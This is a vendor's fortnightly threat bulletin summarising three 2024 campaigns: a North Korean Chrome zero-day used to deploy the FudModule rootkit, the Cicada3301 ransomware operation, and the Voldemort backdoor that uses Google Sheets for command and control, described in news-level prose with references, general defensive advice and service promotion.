A recent report from Microsoft has revealed that the North Korean threat actor Citrine Sleet has been exploiting a zero-day vulnerability in Google Chrome to deploy a sophisticated rootkit. The rootkit, known as FudModule, provides attackers with extensive system control, allowing them to steal sensitive data, monitor network traffic, and perform other malicious activities.
The zero-day vulnerability, identified as CVE-2024-7971, is a type of confusion flaw in the V8 JavaScript and WebAssembly engine that allows attackers to execute arbitrary code within the sandboxed Chromium renderer process. Citrine Sleet is believed to have leveraged this vulnerability to gain initial access to target systems before deploying the FudModule rootkit.
The rootkit’s capabilities include:
Microsoft has warned that the FudModule rootkit is a significant threat and urged users to update their Chrome browsers to the latest version to patch the vulnerability. Organisations should implement robust security measures, such as firewalls, intrusion detection systems, and regular security audits, to protect against similar attacks.
The exploitation of this zero-day vulnerability by Citrine Sleet highlights the ongoing threat posed by North Korean cyber actors. These groups have been increasingly active in recent years, targeting governments, businesses, and critical infrastructure with a variety of malicious activities.
To protect themselves from Citrine Sleet and other cyber threats, organisations and individuals should:
By utilising NormCyber’s Vulnerability Patch Management module, customers can ensure they are protected against vulnerabilities disclosed via vendor bug bounty programs.
References:
North Korean threat actor Citrine Sleet exploiting Chromium zero-day | Microsoft Security Blog
North Korean hackers exploit Chrome zero-day to deploy rootkit | Bleeping Computer
North Korean hackers exploited Chrome zero-day to steal crypto | Yahoo
Google Chrome Vulnerability Exploited by North Korean Hackers, Microsoft Warns | Security Bitcoin News
A new ransomware-as-a-service (RaaS) operation named Cicada3301 has swiftly made its presence known by listing 19 victims on its extortion portal. This sophisticated cyber crime group is rapidly targeting companies worldwide.
Despite sharing a name with a mysterious online/real-world game from 2012-2014, there is no connection between the game and this ransomware operation. The original game, known for its cryptographic puzzles, has officially distanced itself from the ransomware and condemned its actions.
Cicada3301 began promoting its operation and recruiting affiliates on June 29, 2024, via the RAMP cyber crime forum. However, reports indicate that the group was active as early as June 6, 2024, suggesting that they were independently operating before their recruitment efforts.
Much like other ransomware operations, Cicada3301 employs double-extortion tactics: breaching networks, stealing data, encrypting files, and using threats to leak stolen data to coerce victims into paying ransoms. They operate a data leak site to facilitate this extortion scheme.
Analysis by TrueSec has uncovered significant similarities between Cicada3301 and ALPHV/BlackCat, suggesting a possible rebrand or a fork by former ALPHV team members. Notable similarities include:
ALPHV, previously involved in a high-profile exit scam, had shut down operations in early March 2024. The Cicada3301 operation may also be linked to the Brutus botnet, which has been associated with large-scale VPN brute-forcing activities targeting various network appliances. The Brutus activity emerged shortly after ALPHV’s shutdown, indicating a possible connection.
Cicada3301’s ransomware is notable for its dual targeting capabilities, affecting both Windows and Linux/VMware ESXi environments. The Linux encryptor for VMware ESXi requires a special key to be entered as a command-line argument. This key is used to decrypt a configuration file that guides the encryption process. The ransomware utilises the ChaCha20 stream cipher for encryption and RSA for securing the symmetric key.
Cicada3301 targets specific file extensions and applies intermittent encryption based on file size, like previous ransomware BlackCat/ALPHV. The encryptor appends a random seven-character extension to encrypted files and generates ransom notes named ‘RECOVER-[extension]-DATA.txt’. It can also be configured to delay execution and bypass VMware ESXi’s virtual machine shutdown procedures before encrypting data.
Make sure to regularly back up your important files and keep those backups disconnected from your network. Use strong, unique passwords and enable two-factor authentication on your accounts. Keep your software up to date with the latest security patches and be cautious with email attachments and links from unknown sources.
If you do fall victim to ransomware, NormCyber‘s Cyber Security Incident Response Team (CSIRT) can assist by coordinating with your Incident Response (IR) team to provide expert guidance on managing the breach, implementing recovery strategies, and facilitating data recovery to minimise the impact on your organisation.
References:
Cicada3301 ransomware’s Linux encryptor targets VMware ESXi systems | Bleeping Computer
New Play ransomware Linux version targets VMware ESXi VMs | Bleeping Computer
3301-statement-september-1-2024.jpg (1020×1320) | Cicada 3301 Metaverse LLC
Cicada 3301 – Ransomware-as-a-Service – Technical Analysis | TrueSec
Proofpoint researchers have identified a sophisticated malware campaign that exploits Google Sheets as a command-and-control (C2) mechanism, targeting over 70 organisations across various sectors globally. Detected on August 5, 2024, the campaign impersonates tax authorities from multiple countries, including the U.S., U.K., France, Germany, Italy, India, and Japan. The attackers have sent approximately 20,000 phishing emails, using tax filing changes as bait to lure victims into clicking malicious Google AMP Cache URLs.
These URLs direct users to a landing page that checks the User-Agent string to identify if the operating system is Windows. If confirmed, the page utilises the search-ms: URI protocol handler to deliver a Windows shortcut (LNK) file disguised as an Adobe Acrobat Reader PDF. When executed, the LNK file triggers a PowerShell command that runs Python from a remote WebDAV share, executing a script without downloading any files to the victim’s computer. This script gathers system information, encoding it in Base64, and transmits it to a domain controlled by the attackers. Following this, a decoy PDF is displayed, and a password-protected ZIP file is downloaded from OpenDrive.
The ZIP archive contains a legitimate executable, “CiscoCollabHost.exe,” which is vulnerable to DLL side-loading, along with a malicious DLL named “CiscoSparkLauncher.dll,” referred to as Voldemort. This custom backdoor, written in C, is designed for information gathering and loading additional malware payloads. Voldemort uses Google Sheets for its C2 operations, facilitating data exfiltration and executing commands from the attackers.
The campaign combines advanced persistent threat (APT) characteristics with techniques common in cyber crime, making it difficult to precisely attribute the activity. Proofpoint noted that the campaign’s approach to abusing file schema URIs to stage malware, particularly through WebDAV and Server Message Block (SMB), mirrors tactics seen in other malware families like Latrodectus, DarkGate, and XWorm. These families are often associated with initial access brokers (IABs) who provide entry points for larger cyber crime operations.
Proofpoint’s analysis uncovered six victims, one of whom is likely a security researcher or sandbox environment. The attackers appear to have cast a wide net initially, possibly to identify high-value targets later. The blend of sophisticated techniques with more basic methods, such as the use of common URI protocols and off-the-shelf tools, creates challenges in assessing the threat actor’s capabilities and the campaign’s ultimate objectives.
While the full extent of the campaign’s impact is yet unknown, researchers suggest that the activities are likely linked to cyber espionage efforts, potentially supporting broader, undisclosed goals. Luckily Proofpoint has disclosed a list of currently known IOCS in their research article that we advise reading.
Alternatively, you could also leave it to the professionals of the industry, here are at NormCyber our Managed Threat Detection and Response package service provides near real-time security monitoring for your network, services and devices. Using telemetry feeds, threat intelligence feeds, use cases and play books, the NormCyber Security Operations Centre (SOC) identifies and isolates threats in near real-time, giving you peace of mind 24 hours a day, every day.
References:
Cyberattackers Exploit Google Sheets for Malware Control in Global Espionage Campaign | The Hacker News
The Malware That Must Not Be Named: Suspected Espionage Campaign Delivers “Voldemort” | Proofpoint US
Voldemort Threat Actors Abusing Google Sheets to Attack Windows Users | GBHackers On Security
NormCyber tracks and monitors the latest security trends and cyber threats and collates these into a fortnightly threat bulletin.
You can receive this bulletin for free, every fortnight, by entering your business email address below:
